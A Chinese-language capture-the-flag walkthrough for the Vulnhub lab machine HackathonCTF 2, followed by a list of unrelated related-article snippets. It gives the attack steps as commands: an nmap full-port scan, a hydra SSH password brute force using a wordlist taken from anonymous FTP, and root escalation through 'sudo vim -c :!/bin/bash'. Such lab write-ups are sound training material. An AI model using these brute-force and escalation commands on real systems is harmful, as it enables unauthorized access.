渗透靶场--HackathonCTF 2

news/2024/12/28 23:01:44/

HackathonCTF 2

1.首先nmap扫描获得ip

image-20210629102116981

2.扫描全端口并记录信息

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 192.168.19.141

image-20210629102225315

3.可以看到ftp上匿名用户可以得到flag1.txt和word.dir

4.那么接下来就是利用这个字典爆破ssh

5.还有一个80端口,目录扫描得到一个happy目录,查看源代码获取到用户名

image-20210629102619880

6.hydra ssh爆破

hydra -l hackathonll -P word.dir -V -f -t 10 -s 7223 192.168.84.195 ssh  

7.得到密码成功登录

image-20210629102815899

image-20210629102917252

8.但是find / -name flag.txt 2>/dev/null 没有找到flag2.txt,那么只能通过提权获得查看权限

9.sudo -l查看当前有权限的命令

image-20210629103652159

可以看到vim就在其中,那么就是vim提权

10.利用sudo vim获得root权限执行命令

sudo vim -c ':!/bin/bash'

11.成功获得root权限找到flag2.txt

image-20210629103842953


http://www.ppmy.cn/news/214750.html

相关文章

ceph kernel rbd (二): rbd map , rbd unmap

当我们使用krbd 的时候,第一件事就是rbd map,这个命令的目的是将一个rbd image 挂载到linux 成为一个block 设备。 比如: [rootatest-guest build]# rbd ls test [rootatest-guest build]# rbd info test rbd image test:size 1 GiB in 256…

达梦DM-达梦数据库DM到SOL SERVER的DBLINK创建

本次搭建的DBLINK为Linux端达梦数据库访问Win端的SQL SERVER数据库,通过配置ODBC连接SQL SERVER数据库,DM创建ODBC的DBLINK连接,来实现DM和SQL SERVER的DBLINK,以下为具体的操作步骤。 DBLINK概述: DBLINK&#xff0…

Vulnhub靶场之HackathonCTF-1

Vulnhub靶场之HackathonCTF-1 靶场下载地址:http://www.vulnhub.com/entry/hackathonctf-1,591/ 本机kali地址:192.168.157.144 信息收集 第一步都是nmap扫描 nmap -sP 192.168.157.144/24真实机是.2,目标主机是.157 接下来扫描端口和详细…

【Android 内存优化】dumpsys meminfo PID 查看单进程内存信息详解

1.内存指标 Item全称含义等价USSUnique Set Size物理内存进程独占的内存PSSProportional Set Size物理内存Pss Uss按比例包含共享库RSSResient Set Size物理内存RSSUSS包含共享库VSSVirtual Set Size虚拟内存VSS RSS未分配实际物理内存 内存的大小关系:VSS>RS…

2+22+222+2222+。。。。

题目描述 求Snaaaaaa…aa…aaa(有n个a)之值,其中a是一个数字,为2。 例如,n5时222222222222222,n由键盘输入。输入 n输出 Sn的值样例输入 5 样例输出 24690 #include"stdio.h" int cal(int *p) { …

进程篇:循环创建N个子进程

进程篇:循环创建N个子进程 标签:fork();N个子进程 从前面的进程篇——fork()可以了解到fork函数会创建父进程和子进程,并且他们在执行的时候,怎么来控制说是先创建父进程,还是先创建子进程呢&…

日期格式的伟大革新--关于日期格式的压缩算法--减少月份占两位格的表示法

日期格式的伟大革新--关于日期格式的压缩算法--减少月份占两位格的表示法 原创:李均宇 2023-01-09于吴川梅菉 2123-09 众所周知,日期格式通用表示法是,四位年份,两位月份,两位日期 忽发奇想,这可不可以…

靶机渗透练习85-HackathonCTF 1

靶机描述 靶机地址:https://www.vulnhub.com/entry/hackathonctf-1,591/ Description N/A 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.3 靶机: IP地址:192.168.9.2 注:靶机与Kali的IP地址只需要在同…